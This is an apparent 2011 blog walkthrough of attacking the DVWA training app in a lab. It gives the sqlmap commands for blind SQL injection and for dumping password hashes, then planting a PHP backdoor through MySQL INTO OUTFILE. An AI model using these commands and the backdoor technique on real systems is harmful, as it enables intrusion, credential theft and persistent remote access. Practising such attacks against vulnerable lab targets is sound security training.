Monday, July 25, 2011

Gaining a Backdoor Through SQL



1. We open the DVWA blind SQL injection page; the link is:
http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/


2. Identify the request parameter on the page (here it is id), because that is the variable sqlmap will test. The first sqlmap run is:

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --dbs


This does not work: without a valid DVWA session the request is redirected to the login page, so sqlmap never sees the vulnerable query. We add the session cookie (PHPSESSID) together with the security=low cookie, give id a real value, and try again:

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --dbs


Now sqlmap enumerates the databases:


3. We try to get an OS shell with --os-shell:

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --os-shell


This fails too. On MySQL, --os-shell works by writing a PHP stager into the web root with INTO OUTFILE, so it needs the FILE privilege and a correct, writable document-root path; when sqlmap cannot find one, it gives up. So we take another route and access the SQL server directly.

4. Then we rerun sqlmap to dump the MySQL users and their password hashes:

root@elha:/pentest/database/sqlmap# python sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli_blind/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=08c438fb02ed2086b4bad5717a87b0f8" --users --passwords


This works: the MySQL user is root and its password is NULL, i.e. empty. As the next step shows, the server also accepts remote connections for root, which is what makes the rest of this possible.

5. Now we connect directly with the mysql client (just press Enter at the password prompt, since the password is empty):

root@elha:/ubuntu# mysql -h 192.168.56.101 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 2
Server version: 5.1.33 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql>



Then we list the databases with SHOW DATABASES:


6. Since the earlier phase targeted DVWA, we use the dvwa database and either create a new table or insert a new record into one of its tables. The record holds the PHP code we want written to disk.


Now we have that record:


7. Then we SELECT that record INTO OUTFILE, writing it as a .php file under the web root so the web server executes it. This only works because root has the FILE privilege, the web server and MySQL run on the same host (192.168.56.101), and the target directory is writable by the mysqld process.


8. Finally, we request the backdoor through the web server to test it, and use it to upload anything else we need.




